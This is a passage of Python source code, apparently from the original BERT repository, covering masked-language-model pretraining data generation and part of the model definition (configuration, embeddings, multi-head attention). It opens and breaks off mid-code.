is_random_next): self.tokens = tokens self.segment_ids = segment_ids self.is_random_next = is_random_next self.masked_lm_positions = masked_lm_positions self.masked_lm_labels = masked_lm_labels def __str__(self): s = "" s += "tokens: %s\n" % (" ".join( [tokenization.printable_text(x) for x in self.tokens])) s += "segment_ids: %s\n" % (" ".join([str(x) for x in self.segment_ids])) s += "is_random_next: %s\n" % self.is_random_next s += "masked_lm_positions: %s\n" % (" ".join( [str(x) for x in self.masked_lm_positions])) s += "masked_lm_labels: %s\n" % (" ".join( [tokenization.printable_text(x) for x in self.masked_lm_labels])) s += "\n" return s def __repr__(self): return self.__str__() def write_instance_to_example_files(instances, tokenizer, max_seq_length, max_predictions_per_seq, output_files): """Create TF example files from `TrainingInstance`s.""" writers = [] for output_file in output_files: writers.append(tf.python_io.TFRecordWriter(output_file)) writer_index = 0 total_written = 0 for (inst_index, instance) in enumerate(instances): input_ids = tokenizer.convert_tokens_to_ids(instance.tokens) input_mask = [1] * len(input_ids) segment_ids = list(instance.segment_ids) assert len(input_ids) <= max_seq_length while len(input_ids) < max_seq_length: input_ids.append(0) input_mask.append(0) segment_ids.append(0) assert len(input_ids) == max_seq_length assert len(input_mask) == max_seq_length assert len(segment_ids) == max_seq_length masked_lm_positions = list(instance.masked_lm_positions) masked_lm_ids = tokenizer.convert_tokens_to_ids(instance.masked_lm_labels) masked_lm_weights = [1.0] * len(masked_lm_ids) while len(masked_lm_positions) < max_predictions_per_seq: masked_lm_positions.append(0) masked_lm_ids.append(0) masked_lm_weights.append(0.0) next_sentence_label = 1 if instance.is_random_next else 0 features = collections.OrderedDict() features["input_ids"] = create_int_feature(input_ids) features["input_mask"] = create_int_feature(input_mask) features["segment_ids"] = create_int_feature(segment_ids) features["masked_lm_positions"] = create_int_feature(masked_lm_positions) features["masked_lm_ids"] = create_int_feature(masked_lm_ids) features["masked_lm_weights"] = create_float_feature(masked_lm_weights) features["next_sentence_labels"] = create_int_feature([next_sentence_label]) tf_example = tf.train.Example(features=tf.train.Features(feature=features)) writers[writer_index].write(tf_example.SerializeToString()) writer_index = (writer_index + 1) % len(writers) total_written += 1 if inst_index < 20: tf.logging.info("*** Example ***") tf.logging.info("tokens: %s" % " ".join( [tokenization.printable_text(x) for x in instance.tokens])) for feature_name in features.keys(): feature = features[feature_name] values = [] if feature.int64_list.value: values = feature.int64_list.value elif feature.float_list.value: values = feature.float_list.value tf.logging.info( "%s: %s" % (feature_name, " ".join([str(x) for x in values]))) for writer in writers: writer.close() tf.logging.info("Wrote %d total instances", total_written) def create_int_feature(values): feature = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values))) return feature def create_float_feature(values): feature = tf.train.Feature(float_list=tf.train.FloatList(value=list(values))) return feature def create_training_instances(input_files, tokenizer, max_seq_length, dupe_factor, short_seq_prob, masked_lm_prob, max_predictions_per_seq, rng): """Create `TrainingInstance`s from raw text.""" all_documents = [[]] # Input file format: # (1) One sentence per line. These should ideally be actual sentences, not # entire paragraphs or arbitrary spans of text. (Because we use the # sentence boundaries for the "next sentence prediction" task). # (2) Blank lines between documents. Document boundaries are needed so # that the "next sentence prediction" task doesn't span between documents. for input_file in input_files: with tf.gfile.GFile(input_file, "r") as reader: while True: line = tokenization.convert_to_unicode(reader.readline()) if not line: break line = line.strip() # Empty lines are used as document delimiters if not line: all_documents.append([]) tokens = tokenizer.tokenize(line) if tokens: all_documents[-1].append(tokens) # Remove empty documents all_documents = [x for x in all_documents if x] rng.shuffle(all_documents) vocab_words = list(tokenizer.vocab.keys()) instances = [] for _ in range(dupe_factor): for document_index in range(len(all_documents)): instances.extend( create_instances_from_document( all_documents, document_index, max_seq_length, short_seq_prob, masked_lm_prob, max_predictions_per_seq, vocab_words, rng)) rng.shuffle(instances) return instances def create_instances_from_document( all_documents, document_index, max_seq_length, short_seq_prob, masked_lm_prob, max_predictions_per_seq, vocab_words, rng): """Creates `TrainingInstance`s for a single document.""" document = all_documents[document_index] # Account for [CLS], [SEP], [SEP] max_num_tokens = max_seq_length - 3 # We *usually* want to fill up the entire sequence since we are padding # to `max_seq_length` anyways, so short sequences are generally wasted # computation. However, we *sometimes* # (i.e., short_seq_prob == 0.1 == 10% of the time) want to use shorter # sequences to minimize the mismatch between pre-training and fine-tuning. # The `target_seq_length` is just a rough target however, whereas # `max_seq_length` is a hard limit. target_seq_length = max_num_tokens if rng.random() < short_seq_prob: target_seq_length = rng.randint(2, max_num_tokens) # We DON'T just concatenate all of the tokens from a document into a long # sequence and choose an arbitrary split point because this would make the # next sentence prediction task too easy. Instead, we split the input into # segments "A" and "B" based on the actual "sentences" provided by the user # input. instances = [] current_chunk = [] current_length = 0 i = 0 while i < len(document): segment = document[i] current_chunk.append(segment) current_length += len(segment) if i == len(document) - 1 or current_length >= target_seq_length: if current_chunk: # `a_end` is how many segments from `current_chunk` go into the `A` # (first) sentence. a_end = 1 if len(current_chunk) >= 2: a_end = rng.randint(1, len(current_chunk) - 1) tokens_a = [] for j in range(a_end): tokens_a.extend(current_chunk[j]) tokens_b = [] # Random next is_random_next = False if len(current_chunk) == 1 or rng.random() < 0.5: is_random_next = True target_b_length = target_seq_length - len(tokens_a) # This should rarely go for more than one iteration for large # corpora. However, just to be careful, we try to make sure that # the random document is not the same as the document # we're processing. for _ in range(10): random_document_index = rng.randint(0, len(all_documents) - 1) if random_document_index != document_index: break random_document = all_documents[random_document_index] random_start = rng.randint(0, len(random_document) - 1) for j in range(random_start, len(random_document)): tokens_b.extend(random_document[j]) if len(tokens_b) >= target_b_length: break # We didn't actually use these segments so we "put them back" so # they don't go to waste. num_unused_segments = len(current_chunk) - a_end i -= num_unused_segments # Actual next else: is_random_next = False for j in range(a_end, len(current_chunk)): tokens_b.extend(current_chunk[j]) truncate_seq_pair(tokens_a, tokens_b, max_num_tokens, rng) assert len(tokens_a) >= 1 assert len(tokens_b) >= 1 tokens = [] segment_ids = [] tokens.append("[CLS]") segment_ids.append(0) for token in tokens_a: tokens.append(token) segment_ids.append(0) tokens.append("[SEP]") segment_ids.append(0) for token in tokens_b: tokens.append(token) segment_ids.append(1) tokens.append("[SEP]") segment_ids.append(1) (tokens, masked_lm_positions, masked_lm_labels) = create_masked_lm_predictions( tokens, masked_lm_prob, max_predictions_per_seq, vocab_words, rng) instance = TrainingInstance( tokens=tokens, segment_ids=segment_ids, is_random_next=is_random_next, masked_lm_positions=masked_lm_positions, masked_lm_labels=masked_lm_labels) instances.append(instance) current_chunk = [] current_length = 0 i += 1 return instances MaskedLmInstance = collections.namedtuple("MaskedLmInstance", ["index", "label"]) def create_masked_lm_predictions(tokens, masked_lm_prob, max_predictions_per_seq, vocab_words, rng): """Creates the predictions for the masked LM objective.""" cand_indexes = [] for (i, token) in enumerate(tokens): if token == "[CLS]" or token == "[SEP]": continue # Whole Word Masking means that if we mask all of the wordpieces # corresponding to an original word. When a word has been split into # WordPieces, the first token does not have any marker and any subsequence # tokens are prefixed with ##. So whenever we see the ## token, we # append it to the previous set of word indexes. # # Note that Whole Word Masking does *not* change the training code # at all -- we still predict each WordPiece independently, softmaxed # over the entire vocabulary. if (FLAGS.do_whole_word_mask and len(cand_indexes) >= 1 and token.startswith("##")): cand_indexes[-1].append(i) else: cand_indexes.append([i]) rng.shuffle(cand_indexes) output_tokens = list(tokens) num_to_predict = min(max_predictions_per_seq, max(1, int(round(len(tokens) * masked_lm_prob)))) masked_lms = [] covered_indexes = set() for index_set in cand_indexes: if len(masked_lms) >= num_to_predict: break # If adding a whole-word mask would exceed the maximum number of # predictions, then just skip this candidate. if len(masked_lms) + len(index_set) > num_to_predict: continue is_any_index_covered = False for index in index_set: if index in covered_indexes: is_any_index_covered = True break if is_any_index_covered: continue for index in index_set: covered_indexes.add(index) masked_token = None # 80% of the time, replace with [MASK] if rng.random() < 0.8: masked_token = "[MASK]" else: # 10% of the time, keep original if rng.random() < 0.5: masked_token = tokens[index] # 10% of the time, replace with random word else: masked_token = vocab_words[rng.randint(0, len(vocab_words) - 1)] output_tokens[index] = masked_token masked_lms.append(MaskedLmInstance(index=index, label=tokens[index])) assert len(masked_lms) <= num_to_predict masked_lms = sorted(masked_lms, key=lambda x: x.index) masked_lm_positions = [] masked_lm_labels = [] for p in masked_lms: masked_lm_positions.append(p.index) masked_lm_labels.append(p.label) return (output_tokens, masked_lm_positions, masked_lm_labels) def truncate_seq_pair(tokens_a, tokens_b, max_num_tokens, rng): """Truncates a pair of sequences to a maximum sequence length.""" while True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_num_tokens: break trunc_tokens = tokens_a if len(tokens_a) > len(tokens_b) else tokens_b assert len(trunc_tokens) >= 1 # We want to sometimes truncate from the front and sometimes from the # back to add more randomness and avoid biases. if rng.random() < 0.5: del trunc_tokens[0] else: trunc_tokens.pop() def main(_): tf.logging.set_verbosity(tf.logging.INFO) tokenizer = tokenization.FullTokenizer( vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case) input_files = [] for input_pattern in FLAGS.input_file.split(","): input_files.extend(tf.gfile.Glob(input_pattern)) tf.logging.info("*** Reading from input files ***") for input_file in input_files: tf.logging.info(" %s", input_file) rng = random.Random(FLAGS.random_seed) instances = create_training_instances( input_files, tokenizer, FLAGS.max_seq_length, FLAGS.dupe_factor, FLAGS.short_seq_prob, FLAGS.masked_lm_prob, FLAGS.max_predictions_per_seq, rng) output_files = FLAGS.output_file.split(",") tf.logging.info("*** Writing to output files ***") for output_file in output_files: tf.logging.info(" %s", output_file) write_instance_to_example_files(instances, tokenizer, FLAGS.max_seq_length, FLAGS.max_predictions_per_seq, output_files) if __name__ == "__main__": flags.mark_flag_as_required("input_file") flags.mark_flag_as_required("output_file") flags.mark_flag_as_required("vocab_file") tf.app.run() File: modeling.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """The main BERT model and related functions.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy import json import math import re import numpy as np import six import tensorflow as tf class BertConfig(object): """Configuration for `BertModel`.""" def __init__(self, vocab_size, hidden_size=768, num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072, hidden_act="gelu", hidden_dropout_prob=0.1, attention_probs_dropout_prob=0.1, max_position_embeddings=512, type_vocab_size=16, initializer_range=0.02): """Constructs BertConfig. Args: vocab_size: Vocabulary size of `inputs_ids` in `BertModel`. hidden_size: Size of the encoder layers and the pooler layer. num_hidden_layers: Number of hidden layers in the Transformer encoder. num_attention_heads: Number of attention heads for each attention layer in the Transformer encoder. intermediate_size: The size of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder. hidden_act: The non-linear activation function (function or string) in the encoder and pooler. hidden_dropout_prob: The dropout probability for all fully connected layers in the embeddings, encoder, and pooler. attention_probs_dropout_prob: The dropout ratio for the attention probabilities. max_position_embeddings: The maximum sequence length that this model might ever be used with. Typically set this to something large just in case (e.g., 512 or 1024 or 2048). type_vocab_size: The vocabulary size of the `token_type_ids` passed into `BertModel`. initializer_range: The stdev of the truncated_normal_initializer for initializing all weight matrices. """ self.vocab_size = vocab_size self.hidden_size = hidden_size self.num_hidden_layers = num_hidden_layers self.num_attention_heads = num_attention_heads self.hidden_act = hidden_act self.intermediate_size = intermediate_size self.hidden_dropout_prob = hidden_dropout_prob self.attention_probs_dropout_prob = attention_probs_dropout_prob self.max_position_embeddings = max_position_embeddings self.type_vocab_size = type_vocab_size self.initializer_range = initializer_range @classmethod def from_dict(cls, json_object): """Constructs a `BertConfig` from a Python dictionary of parameters.""" config = BertConfig(vocab_size=None) for (key, value) in six.iteritems(json_object): config.__dict__[key] = value return config @classmethod def from_json_file(cls, json_file): """Constructs a `BertConfig` from a json file of parameters.""" with tf.gfile.GFile(json_file, "r") as reader: text = reader.read() return cls.from_dict(json.loads(text)) def to_dict(self): """Serializes this instance to a Python dictionary.""" output = copy.deepcopy(self.__dict__) return output def to_json_string(self): """Serializes this instance to a JSON string.""" return json.dumps(self.to_dict(), indent=2, sort_keys=True) + "\n" class BertModel(object): """BERT model ("Bidirectional Encoder Representations from Transformers"). Example usage: ```python # Already been converted into WordPiece token ids input_ids = tf.constant([[31, 51, 99], [15, 5, 0]]) input_mask = tf.constant([[1, 1, 1], [1, 1, 0]]) token_type_ids = tf.constant([[0, 0, 1], [0, 2, 0]]) config = modeling.BertConfig(vocab_size=32000, hidden_size=512, num_hidden_layers=8, num_attention_heads=6, intermediate_size=1024) model = modeling.BertModel(config=config, is_training=True, input_ids=input_ids, input_mask=input_mask, token_type_ids=token_type_ids) label_embeddings = tf.get_variable(...) pooled_output = model.get_pooled_output() logits = tf.matmul(pooled_output, label_embeddings) ... ``` """ def __init__(self, config, is_training, input_ids, input_mask=None, token_type_ids=None, use_one_hot_embeddings=False, scope=None): """Constructor for BertModel. Args: config: `BertConfig` instance. is_training: bool. true for training model, false for eval model. Controls whether dropout will be applied. input_ids: int32 Tensor of shape [batch_size, seq_length]. input_mask: (optional) int32 Tensor of shape [batch_size, seq_length]. token_type_ids: (optional) int32 Tensor of shape [batch_size, seq_length]. use_one_hot_embeddings: (optional) bool. Whether to use one-hot word embeddings or tf.embedding_lookup() for the word embeddings. scope: (optional) variable scope. Defaults to "bert". Raises: ValueError: The config is invalid or one of the input tensor shapes is invalid. """ config = copy.deepcopy(config) if not is_training: config.hidden_dropout_prob = 0.0 config.attention_probs_dropout_prob = 0.0 input_shape = get_shape_list(input_ids, expected_rank=2) batch_size = input_shape[0] seq_length = input_shape[1] if input_mask is None: input_mask = tf.ones(shape=[batch_size, seq_length], dtype=tf.int32) if token_type_ids is None: token_type_ids = tf.zeros(shape=[batch_size, seq_length], dtype=tf.int32) with tf.variable_scope(scope, default_name="bert"): with tf.variable_scope("embeddings"): # Perform embedding lookup on the word ids. (self.embedding_output, self.embedding_table) = embedding_lookup( input_ids=input_ids, vocab_size=config.vocab_size, embedding_size=config.hidden_size, initializer_range=config.initializer_range, word_embedding_name="word_embeddings", use_one_hot_embeddings=use_one_hot_embeddings) # Add positional embeddings and token type embeddings, then layer # normalize and perform dropout. self.embedding_output = embedding_postprocessor( input_tensor=self.embedding_output, use_token_type=True, token_type_ids=token_type_ids, token_type_vocab_size=config.type_vocab_size, token_type_embedding_name="token_type_embeddings", use_position_embeddings=True, position_embedding_name="position_embeddings", initializer_range=config.initializer_range, max_position_embeddings=config.max_position_embeddings, dropout_prob=config.hidden_dropout_prob) with tf.variable_scope("encoder"): # This converts a 2D mask of shape [batch_size, seq_length] to a 3D # mask of shape [batch_size, seq_length, seq_length] which is used # for the attention scores. attention_mask = create_attention_mask_from_input_mask( input_ids, input_mask) # Run the stacked transformer. # `sequence_output` shape = [batch_size, seq_length, hidden_size]. self.all_encoder_layers = transformer_model( input_tensor=self.embedding_output, attention_mask=attention_mask, hidden_size=config.hidden_size, num_hidden_layers=config.num_hidden_layers, num_attention_heads=config.num_attention_heads, intermediate_size=config.intermediate_size, intermediate_act_fn=get_activation(config.hidden_act), hidden_dropout_prob=config.hidden_dropout_prob, attention_probs_dropout_prob=config.attention_probs_dropout_prob, initializer_range=config.initializer_range, do_return_all_layers=True) self.sequence_output = self.all_encoder_layers[-1] # The "pooler" converts the encoded sequence tensor of shape # [batch_size, seq_length, hidden_size] to a tensor of shape # [batch_size, hidden_size]. This is necessary for segment-level # (or segment-pair-level) classification tasks where we need a fixed # dimensional representation of the segment. with tf.variable_scope("pooler"): # We "pool" the model by simply taking the hidden state corresponding # to the first token. We assume that this has been pre-trained first_token_tensor = tf.squeeze(self.sequence_output[:, 0:1, :], axis=1) self.pooled_output = tf.layers.dense( first_token_tensor, config.hidden_size, activation=tf.tanh, kernel_initializer=create_initializer(config.initializer_range)) def get_pooled_output(self): return self.pooled_output def get_sequence_output(self): """Gets final hidden layer of encoder. Returns: float Tensor of shape [batch_size, seq_length, hidden_size] corresponding to the final hidden of the transformer encoder. """ return self.sequence_output def get_all_encoder_layers(self): return self.all_encoder_layers def get_embedding_output(self): """Gets output of the embedding lookup (i.e., input to the transformer). Returns: float Tensor of shape [batch_size, seq_length, hidden_size] corresponding to the output of the embedding layer, after summing the word embeddings with the positional embeddings and the token type embeddings, then performing layer normalization. This is the input to the transformer. """ return self.embedding_output def get_embedding_table(self): return self.embedding_table def gelu(x): """Gaussian Error Linear Unit. This is a smoother version of the RELU. Original paper: https://arxiv.org/abs/1606.08415 Args: x: float Tensor to perform activation. Returns: `x` with the GELU activation applied. """ cdf = 0.5 * (1.0 + tf.tanh( (np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3))))) return x * cdf def get_activation(activation_string): """Maps a string to a Python function, e.g., "relu" => `tf.nn.relu`. Args: activation_string: String name of the activation function. Returns: A Python function corresponding to the activation function. If `activation_string` is None, empty, or "linear", this will return None. If `activation_string` is not a string, it will return `activation_string`. Raises: ValueError: The `activation_string` does not correspond to a known activation. """ # We assume that anything that"s not a string is already an activation # function, so we just return it. if not isinstance(activation_string, six.string_types): return activation_string if not activation_string: return None act = activation_string.lower() if act == "linear": return None elif act == "relu": return tf.nn.relu elif act == "gelu": return gelu elif act == "tanh": return tf.tanh else: raise ValueError("Unsupported activation: %s" % act) def get_assignment_map_from_checkpoint(tvars, init_checkpoint): """Compute the union of the current variables and checkpoint variables.""" assignment_map = {} initialized_variable_names = {} name_to_variable = collections.OrderedDict() for var in tvars: name = var.name m = re.match("^(.*):\\d+$", name) if m is not None: name = m.group(1) name_to_variable[name] = var init_vars = tf.train.list_variables(init_checkpoint) assignment_map = collections.OrderedDict() for x in init_vars: (name, var) = (x[0], x[1]) if name not in name_to_variable: continue assignment_map[name] = name initialized_variable_names[name] = 1 initialized_variable_names[name + ":0"] = 1 return (assignment_map, initialized_variable_names) def dropout(input_tensor, dropout_prob): """Perform dropout. Args: input_tensor: float Tensor. dropout_prob: Python float. The probability of dropping out a value (NOT of *keeping* a dimension as in `tf.nn.dropout`). Returns: A version of `input_tensor` with dropout applied. """ if dropout_prob is None or dropout_prob == 0.0: return input_tensor output = tf.nn.dropout(input_tensor, 1.0 - dropout_prob) return output def layer_norm(input_tensor, name=None): """Run layer normalization on the last dimension of the tensor.""" return tf.contrib.layers.layer_norm( inputs=input_tensor, begin_norm_axis=-1, begin_params_axis=-1, scope=name) def layer_norm_and_dropout(input_tensor, dropout_prob, name=None): """Runs layer normalization followed by dropout.""" output_tensor = layer_norm(input_tensor, name) output_tensor = dropout(output_tensor, dropout_prob) return output_tensor def create_initializer(initializer_range=0.02): """Creates a `truncated_normal_initializer` with the given range.""" return tf.truncated_normal_initializer(stddev=initializer_range) def embedding_lookup(input_ids, vocab_size, embedding_size=128, initializer_range=0.02, word_embedding_name="word_embeddings", use_one_hot_embeddings=False): """Looks up words embeddings for id tensor. Args: input_ids: int32 Tensor of shape [batch_size, seq_length] containing word ids. vocab_size: int. Size of the embedding vocabulary. embedding_size: int. Width of the word embeddings. initializer_range: float. Embedding initialization range. word_embedding_name: string. Name of the embedding table. use_one_hot_embeddings: bool. If True, use one-hot method for word embeddings. If False, use `tf.gather()`. Returns: float Tensor of shape [batch_size, seq_length, embedding_size]. """ # This function assumes that the input is of shape [batch_size, seq_length, # num_inputs]. # # If the input is a 2D tensor of shape [batch_size, seq_length], we # reshape to [batch_size, seq_length, 1]. if input_ids.shape.ndims == 2: input_ids = tf.expand_dims(input_ids, axis=[-1]) embedding_table = tf.get_variable( name=word_embedding_name, shape=[vocab_size, embedding_size], initializer=create_initializer(initializer_range)) flat_input_ids = tf.reshape(input_ids, [-1]) if use_one_hot_embeddings: one_hot_input_ids = tf.one_hot(flat_input_ids, depth=vocab_size) output = tf.matmul(one_hot_input_ids, embedding_table) else: output = tf.gather(embedding_table, flat_input_ids) input_shape = get_shape_list(input_ids) output = tf.reshape(output, input_shape[0:-1] + [input_shape[-1] * embedding_size]) return (output, embedding_table) def embedding_postprocessor(input_tensor, use_token_type=False, token_type_ids=None, token_type_vocab_size=16, token_type_embedding_name="token_type_embeddings", use_position_embeddings=True, position_embedding_name="position_embeddings", initializer_range=0.02, max_position_embeddings=512, dropout_prob=0.1): """Performs various post-processing on a word embedding tensor. Args: input_tensor: float Tensor of shape [batch_size, seq_length, embedding_size]. use_token_type: bool. Whether to add embeddings for `token_type_ids`. token_type_ids: (optional) int32 Tensor of shape [batch_size, seq_length]. Must be specified if `use_token_type` is True. token_type_vocab_size: int. The vocabulary size of `token_type_ids`. token_type_embedding_name: string. The name of the embedding table variable for token type ids. use_position_embeddings: bool. Whether to add position embeddings for the position of each token in the sequence. position_embedding_name: string. The name of the embedding table variable for positional embeddings. initializer_range: float. Range of the weight initialization. max_position_embeddings: int. Maximum sequence length that might ever be used with this model. This can be longer than the sequence length of input_tensor, but cannot be shorter. dropout_prob: float. Dropout probability applied to the final output tensor. Returns: float tensor with same shape as `input_tensor`. Raises: ValueError: One of the tensor shapes or input values is invalid. """ input_shape = get_shape_list(input_tensor, expected_rank=3) batch_size = input_shape[0] seq_length = input_shape[1] width = input_shape[2] output = input_tensor if use_token_type: if token_type_ids is None: raise ValueError("`token_type_ids` must be specified if" "`use_token_type` is True.") token_type_table = tf.get_variable( name=token_type_embedding_name, shape=[token_type_vocab_size, width], initializer=create_initializer(initializer_range)) # This vocab will be small so we always do one-hot here, since it is always # faster for a small vocabulary. flat_token_type_ids = tf.reshape(token_type_ids, [-1]) one_hot_ids = tf.one_hot(flat_token_type_ids, depth=token_type_vocab_size) token_type_embeddings = tf.matmul(one_hot_ids, token_type_table) token_type_embeddings = tf.reshape(token_type_embeddings, [batch_size, seq_length, width]) output += token_type_embeddings if use_position_embeddings: assert_op = tf.assert_less_equal(seq_length, max_position_embeddings) with tf.control_dependencies([assert_op]): full_position_embeddings = tf.get_variable( name=position_embedding_name, shape=[max_position_embeddings, width], initializer=create_initializer(initializer_range)) # Since the position embedding table is a learned variable, we create it # using a (long) sequence length `max_position_embeddings`. The actual # sequence length might be shorter than this, for faster training of # tasks that do not have long sequences. # # So `full_position_embeddings` is effectively an embedding table # for position [0, 1, 2, ..., max_position_embeddings-1], and the current # sequence has positions [0, 1, 2, ... seq_length-1], so we can just # perform a slice. position_embeddings = tf.slice(full_position_embeddings, [0, 0], [seq_length, -1]) num_dims = len(output.shape.as_list()) # Only the last two dimensions are relevant (`seq_length` and `width`), so # we broadcast among the first dimensions, which is typically just # the batch size. position_broadcast_shape = [] for _ in range(num_dims - 2): position_broadcast_shape.append(1) position_broadcast_shape.extend([seq_length, width]) position_embeddings = tf.reshape(position_embeddings, position_broadcast_shape) output += position_embeddings output = layer_norm_and_dropout(output, dropout_prob) return output def create_attention_mask_from_input_mask(from_tensor, to_mask): """Create 3D attention mask from a 2D tensor mask. Args: from_tensor: 2D or 3D Tensor of shape [batch_size, from_seq_length, ...]. to_mask: int32 Tensor of shape [batch_size, to_seq_length]. Returns: float Tensor of shape [batch_size, from_seq_length, to_seq_length]. """ from_shape = get_shape_list(from_tensor, expected_rank=[2, 3]) batch_size = from_shape[0] from_seq_length = from_shape[1] to_shape = get_shape_list(to_mask, expected_rank=2) to_seq_length = to_shape[1] to_mask = tf.cast( tf.reshape(to_mask, [batch_size, 1, to_seq_length]), tf.float32) # We don't assume that `from_tensor` is a mask (although it could be). We # don't actually care if we attend *from* padding tokens (only *to* padding) # tokens so we create a tensor of all ones. # # `broadcast_ones` = [batch_size, from_seq_length, 1] broadcast_ones = tf.ones( shape=[batch_size, from_seq_length, 1], dtype=tf.float32) # Here we broadcast along two dimensions to create the mask. mask = broadcast_ones * to_mask return mask def attention_layer(from_tensor, to_tensor, attention_mask=None, num_attention_heads=1, size_per_head=512, query_act=None, key_act=None, value_act=None, attention_probs_dropout_prob=0.0, initializer_range=0.02, do_return_2d_tensor=False, batch_size=None, from_seq_length=None, to_seq_length=None): """Performs multi-headed attention from `from_tensor` to `to_tensor`. This is an implementation of multi-headed attention based on "Attention is all you Need". If `from_tensor` and `to_tensor` are the same, then this is self-attention. Each timestep in `from_tensor` attends to the corresponding sequence in `to_tensor`, and returns a fixed-with vector. This function first projects `from_tensor` into a "query" tensor and `to_tensor` into "key" and "value" tensors. These are (effectively) a list of tensors of length `num_attention_heads`, where each tensor is of shape [batch_size, seq_length, size_per_head]. Then, the query and key tensors are dot-producted and scaled. These are softmaxed to obtain attention probabilities. The value tensors are then interpolated by these probabilities, then concatenated back to a single tensor and returned. In practice, the multi-headed attention are done with transposes and reshapes rather than actual separate tensors. Args: from_tensor: float Tensor of shape [batch_size, from_seq_length, from_width]. to_tensor: float Tensor of shape [batch_size, to_seq_length, to_width]. attention_mask: (optional) int32 Tensor of shape [batch_size, from_seq_length, to_seq_length]. The values should be 1 or 0. The attention scores will effectively be set to -infinity for any positions in the mask that are 0, and will be unchanged for positions that are 1. num_attention_heads: int. Number of attention heads. size_per_head: int. Size of each attention head. query_act: (optional) Activation function for the query transform. key_act: (optional) Activation function for the key transform. value_act: (optional) Activation function for the value transform. attention_probs_dropout_prob: (optional) float. Dropout probability of the attention probabilities. initializer_range: float. Range of the weight initializer. do_return_2d_tensor: bool. If True, the output will be of shape [batch_size * from_seq_length, num_attention_heads * size_per_head]. If False, the output will be of shape [batch_size, from_seq_length, num_attention_heads * size_per_head]. batch_size: (Optional) int. If the input is 2D, this might be the batch size of the 3D version of the `from_tensor` and `to_tensor`. from_seq_length: (Optional) If the input is 2D, this might be the seq length of the 3D version of the `from_tensor`. to_seq_length: (Optional) If the input is 2D, this might be the seq length of the 3D version of the `to_tensor`. Returns: float Tensor of shape [batch_size, from_seq_length, num_attention_heads * size_per_head]. (If `do_return_2d_tensor` is true, this will be of shape [batch_size * from_seq_length, num_attention_heads * size_per_head]). Raises: ValueError: Any of the arguments or tensor shapes are invalid. """ def transpose_for_scores(input_tensor, batch_size, num_attention_heads, seq_length, width): output_tensor = tf.reshape( input_tensor, [batch_size, seq_length, num_attention_heads, width]) output_tensor = tf.transpose(output_tensor, [0, 2, 1, 3]) return output_tensor from_shape = get_shape_list(from_tensor, expected_rank=[2, 3]) to_shape = get_shape_list(to_tensor, expected_rank=[2, 3]) if len(from_shape) != len(to_shape): raise ValueError( "The rank of `from_tensor` must match the rank of `to_tensor`.") if len(from_shape) == 3: batch_size = from_shape[0] from_seq_length = from_shape[1] to_seq_length = to_shape[1] elif len(from_shape) == 2: if (batch_size is None or from_seq_length is None or to_seq_length is None): raise ValueError( "When passing in rank 2 tensors to attention_layer, the values " "for `batch_size`, `from_seq_length`, and `to_seq_length` " "must all be specified.") # Scalar dimensions referenced here: # B = batch size (number of sequences) # F = `from_tensor` sequence length # T = `to_tensor` sequence length # N = `num_attention_heads` # H = `size_per_head` from_tensor_2d = reshape_to_matrix(from_tensor) to_tensor_2d = reshape_to_matrix(to_tensor) # `query_layer` = [B*F, N*H] query_layer = tf.layers.dense( from_tensor_2d, num_attention_heads * size_per_head, activation=query_act, name="query", kernel_initializer=create_initializer(initializer_range)) # `key_layer` = [B*T, N*H] key_layer = tf.layers.dense( to_tensor_2d, num_attention_heads * size_per_head, activation=key_act, name="key", kernel_initializer=create_initializer(initializer_range)) # `value_layer` = [B*T, N*H] value_layer = tf.layers.dense( to_tensor_2d, num_attention_heads * size_per_head, activation=value_act, name="value", kernel_initializer=create_initializer(initializer_range)) # `query_layer` = [B, N, F, H] query_layer = transpose_for_scores(query_layer, batch_size, num_attention_heads, from_seq_length, size_per_head) # `key_layer` = [B, N, T, H] key_layer = transpose_for_scores(key_layer, batch_size, num_attention_heads, to_seq_length, size_per_head) # Take the dot product between "query" and "key" to get the raw # attention scores. # `attention_scores` = [B, N, F, T] attention_scores = tf.matmul(query_layer, key_layer, transpose_b=True) attention_scores = tf.multiply(attention_scores, 1.0 / math.sqrt(float(size_per_head))) if attention_mask is not None: # `attention_mask` = [B, 1, F, T] attention_mask = tf.expand_dims(attention_mask, axis=[1]) # Since attention_mask is 1.0 for positions we want to attend and 0.0 for # masked positions, this operation will create a tensor which is 0.0 for # positions we want to attend and -10000.0 for masked positions. adder = (1.0 - tf.cast(attention_mask, tf.float32)) * -10000.0 # Since we are adding it to the raw scores before the softmax, this is # effectively the same as removing these entirely. attention_scores += adder # Normalize the attention scores to probabilities. # `attention_probs` = [B, N, F, T] attention_probs = tf.nn.softmax(attention_scores) # This is actually dropping out entire tokens to attend to, which might # seem a bit unusual, but is taken from the original Transformer paper. attention_probs = dropout(attention_probs, attention_probs_dropout_prob) # `value_layer` = [B, T, N, H] value_layer = tf.reshape( value_layer, [batch_size, to_seq_length, num_attention_heads, size_per_head]) # `value_layer` = [B, N, T, H] value_layer = tf.transpose(value_layer, [0, 2, 1, 3]) # `context_layer` = [B, N, F, H] context_layer = tf.matmul(attention_probs, value_layer) # `context_layer` = [B, F, N, H] context_layer = tf.transpose(context_layer, [0, 2, 1, 3]) if do_return_2d_tensor: # `context_layer` = [B*F, N*H] context_layer = tf.reshape( context_layer, [batch_size * from_seq_length, num_attention_heads * size_per_head]) else: # `context_layer` = [B, F, N*H] context_layer = tf.reshape( context_layer, [batch_size, from_seq_length, num_attention_heads * size_per_head]) return context_layer def transformer_model(input_tensor, attention_mask=None, hidden_size=768, num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072, intermediate_act_fn=gelu, hidden_dropout_prob=0.1, attention_probs_dropout_prob=0.1, initializer_range=0.02, do_return_all_layers=False): """Multi-headed, multi-layer Transformer from "Attention is All You Need". This is almost an exact implementation of the original Transformer encoder. See the original paper: 